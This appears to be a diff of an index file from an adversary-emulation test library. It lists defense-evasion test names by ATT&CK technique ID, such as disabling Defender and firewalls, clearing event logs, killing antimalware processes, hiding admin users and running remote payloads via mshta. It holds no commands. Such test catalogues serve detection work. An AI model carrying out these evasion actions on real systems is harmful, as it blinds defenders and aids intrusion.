defense-evasion,T1070.001,Clear Windows Event Logs,3,Clear Event Logs via VBA,1b682d84-f075-4f93-9a89-8a8de19ffd6e,powershell
defense-evasion,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1027.004,Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,bash
defense-evasion,T1027.004,Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,bash
defense-evasion,T1027.004,Compile After Delivery,5,Go compile,78bd3fa7-773c-449e-a978-dc1f1500bc52,bash
defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
defense-evasion,T1218.001,Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
@@ -351,42 +262,20 @@ defense-evasion,T1218.001,Compiled HTML File,5,Invoke CHM Simulate Double click,
defense-evasion,T1218.001,Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
defense-evasion,T1218.001,Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
defense-evasion,T1562.008,Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.002,Disable Windows Event Logging,5,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
defense-evasion,T1562.002,Disable Windows Event Logging,6,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable iptables firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.004,Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,8,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,9,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,10,Add and delete UFW firewall rules,b2563a4e-c4b8-429c-8d47-d5bcb227ba7a,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,11,Edit UFW firewall user.rules file,beaf815a-c883-4194-97e9-fdbbb2bbdd7c,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,12,Edit UFW firewall ufw.conf file,c1d8c4eb-88da-4927-ae97-c7c25893803b,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,13,Edit UFW firewall sysctl.conf file,c4ae0701-88d3-4cd8-8bce-4801ed9f97e4,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,14,Edit UFW firewall main configuration file,7b697ece-8270-46b5-bbc7-6b9e27081831,sh
defense-evasion,T1562.004,Disable or Modify System Firewall,15,Tail the UFW firewall log file,419cca0c-fa52-4572-b0d7-bc7c6f388a27,sh
defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
@@ -411,15 +300,6 @@ defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falco
defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
defense-evasion,T1562.001,Disable or Modify Tools,29,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
@@ -431,6 +311,8 @@ defense-evasion,T1070.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f1
defense-evasion,T1070.004,File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
defense-evasion,T1070.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1553.001,Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1564.001,Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh
defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
@@ -438,30 +320,19 @@ defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden F
defense-evasion,T1564.001,Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
defense-evasion,T1564.001,Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
defense-evasion,T1564.001,Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1562.006,Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
defense-evasion,T1562.006,Indicator Blocking,4,Disable .NET Event Tracing for Windows Via Registry (cmd),8a4c33be-a0d3-434a-bee6-315405edbd5b,command_prompt
defense-evasion,T1562.006,Indicator Blocking,5,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
defense-evasion,T1562.006,Indicator Blocking,2,Lgging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt
defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
defense-evasion,T1553.004,Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
defense-evasion,T1553.004,Install Root Certificate,6,Add Root Certificate to CurrentUser Certificate Store,ca20a3f1-42b5-4e21-ad3f-1049199ec2e0,powershell
defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
defense-evasion,T1218.004,InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
defense-evasion,T1218.004,InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell
@@ -470,6 +341,8 @@ defense-evasion,T1218.004,InstallUtil,5,InstallUtil Uninstall method call - /U v
defense-evasion,T1218.004,InstallUtil,6,InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant,06d9deba-f732-48a8-af8e-bdd6e4d98c1d,powershell
defense-evasion,T1218.004,InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell
defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell
defense-evasion,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
@@ -479,53 +352,14 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
defense-evasion,T1078.003,Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
defense-evasion,T1553.005,Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks,58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1036.005,Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
defense-evasion,T1112,Modify Registry,33,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -535,18 +369,9 @@ defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from
defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
defense-evasion,T1218.007,Msiexec,4,Msiexec.exe - Execute Local MSI file with an embedded EXE,ed3fa08a-ca18-4009-973e-03d13014d0e8,command_prompt
defense-evasion,T1218.007,Msiexec,5,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,882082f0-27c6-4eec-a43c-9aa80bccdb30,powershell
defense-evasion,T1218.007,Msiexec,6,WMI Win32_Product Class - Execute Local MSI file with embedded VBScript,cf470d9a-58e7-43e5-b0d2-805dffc05576,powershell
defense-evasion,T1218.007,Msiexec,7,WMI Win32_Product Class - Execute Local MSI file with an embedded DLL,32eb3861-30da-4993-897a-42737152f5f8,powershell
defense-evasion,T1218.007,Msiexec,8,WMI Win32_Product Class - Execute Local MSI file with an embedded EXE,55080eb0-49ae-4f55-a440-4167b7974f79,powershell
defense-evasion,T1218.007,Msiexec,9,Msiexec.exe - Execute the DllRegisterServer function of a DLL,0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d,command_prompt
defense-evasion,T1218.007,Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
defense-evasion,T1218.007,Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
@@ -554,16 +379,10 @@ defense-evasion,T1564.004,NTFS File Attributes,4,Create ADS PowerShell,0045ea16-
defense-evasion,T1070.005,Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
defense-evasion,T1070.005,Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
defense-evasion,T1070.005,Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
defense-evasion,T1070.005,Network Share Connection Removal,4,Disable Administrative Share Creation at Startup,99c657aa-ebeb-4179-a665-69288fdd12b8,command_prompt
defense-evasion,T1070.005,Network Share Connection Removal,5,Remove Administrative Shares,4299eff5-90f1-4446-b2f3-7f4f5cfd5d62,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
